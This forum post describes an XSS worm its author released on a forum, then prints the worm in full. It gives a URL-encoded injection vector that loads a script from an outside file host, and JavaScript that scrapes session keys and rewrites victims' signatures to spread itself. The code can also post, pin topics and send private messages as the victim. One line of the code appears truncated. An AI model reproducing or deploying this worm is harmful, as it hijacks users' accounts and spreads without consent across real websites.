Quote
I once wrote an xss worm on a forum based on a flaw in a javascript code (it called unescape on info from the user's signature). I had it add it's code as well as a bit of invisible text as a payload and it took several weeks before it was discovered. By that time every active member of the forum had the worm in their signature. The admin must have discovered what the source of the problem was because the code was removed (and the worm failed to work after that). I could publish the code if it's of interest.
Here is the vector:
<a href='http://eapr-1/@0@%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%2E%74%78%74%27%29%22%20%2F%3E@-2@@1@0@-3@@' target='_blank'></a>
Here is the worm code itself:
var req = null; var stage = 0; var hack = "sig"; var url = "http://maple-world.net/"; var member = ""; var forum = ""; var topic = ""; var title = ""; var post = " ~~~~@"; vector="%3C%69%6D%67%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%31%2E%74%69%6E%79%70%69%63%2E%63%6F%6D%2F%32%76%76%31%61%68%31%2E%67%69%66%22%20%6F%6E%6C%6F%61%64%3D%22%6C%6F%61%64%6A%73%28%27%68%74%74%70%3A%2F%2F%77%77%77%2E%66%69%6C%65%64%65%6E%2E%63%6F%6D%2F%66%69%6C%65%73%2F%32%30%30%36%2F%31%31%2F%32%37%2F%34%32%38%32%35%35%2F%74%65%73%74%32%2E%74%78%74%27%29%22%20%2F%3E"; if (window.XMLHttpRequest) { req = new XMLHttpRequest(); if (req.overrideMimeType) { req.overrideMimeType('text/xml'); } } else if (window.ActiveXObject) { try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch (e) { try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch (e) {} } } req.onreadystatechange = function() { if(req.readyState == 4) { if(req.status == 200) { if(hack == "post" || hack == "pin") { stage += 1; if(stage==1) { var i = req.responseText.indexOf("auth_key' value='") + 17; auth = req.responseText.substring(i, i + 32); req.open("POST", url + "index.php?", true); if(hack=="post") { var parameters = "act=Post&s=&f="+forum+"&auth_key="+auth+"&CODE=03&enableemo=yes&t="+topic+"&Post="+post; } else if(hack == "pin") { var parameters = "act=Mod&f="+forum+"&auth_key="+auth+"&CODE=15&t="+topic; } req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } } else if(hack=="sig") { stage+=1; if(stage==1) { key=req.responseText.match(/<input type='hidden' name='key' value='([0-9a-f]+)' \/>/)[1]; old=req.responseText.match(/<textarea cols='60' rows='12' name='Post' tabindex='3' class='textinput'>([\s\S]+?)<\/textarea>/)[1]; xpr=old.match(/<a href='http:\/\/eapr-1\/(@[^@]*@[^@]*)(@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@[^@]*@)' target='_blank'><\/a>/); if(xpr){ if(xpr[1].indexOf(vector)<0){xpr1=xpr[1]+vector;}else{xpr1=xpr[1];} nxp="+"]"; old=old.replace(/<a href='http:\/\/eapr-1\/[^']+' target='_blank'><\/a>/,nxp); } if(old.indexOf(post)<0){ parameters="act=UserCP&CODE=23&key="+key+"&Post="+encodeURIComponent(old+post); req.open("POST", url + "index.php?", true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } } } } } }; if(stage==0) { if(hack=="post" || hack=="pin") { req.open("GET", url + "index.php?act=Post&CODE=02&f="+forum+"&t="+topic, true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.send(null); } else if(hack=="PM") { req.open("POST", url + "index.php?", true); post = encodeURI(post); title = encodeURI(title); var parameters = "act=Msg&CODE=04&MODE=01&OID=&entered_name="+member+"&msg_title="+title+"&Post="+post; req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.setRequestHeader("Content-length", parameters.length); req.setRequestHeader("Connection", "close"); req.send(parameters); } else if(hack=="sig") { req.open("GET", url + "index.php?act=UserCP&CODE=22", true); req.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); req.send(null); } }